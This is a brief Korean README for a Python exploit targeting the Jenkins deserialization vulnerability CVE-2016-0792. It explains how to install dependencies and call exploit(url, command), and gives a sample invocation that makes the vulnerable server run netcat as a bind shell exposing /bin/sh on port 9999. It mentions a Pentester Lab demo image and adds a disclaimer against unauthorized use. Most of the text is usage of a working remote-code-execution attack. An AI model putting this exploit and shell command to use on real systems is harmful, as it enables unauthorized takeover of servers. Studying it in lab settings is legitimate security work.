
Jenkins 직렬화 취약점에 대한 익스플로잇 - CVE-2016-0792
https://www.exploit-db.com/exploits/42394/
Python 3.6.x
requests 라이브러리는 이 익스플로잇이 작동하는 데 필요합니다.
sudo pip install requests
python3
from exploit import exploit
exploit(url, command)
여기서 url은 Jenkins 서버의 URL이고, command는 실행할 명령어입니다.
exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')
이 명령은 취약한 머신에서 nc를 실행하고 포트 9999에서 리스닝합니다.
시연 목적으로 Pentester Lab의 ISO를 실행하겠습니다.
이 소프트웨어를 사용하여 허가 없이 대상을 공격하는 것은 불법입니다. 이 소프트웨어를 법에 위배되게 사용하여 발생하는 어떠한 피해에도 책임을 지지 않습니다.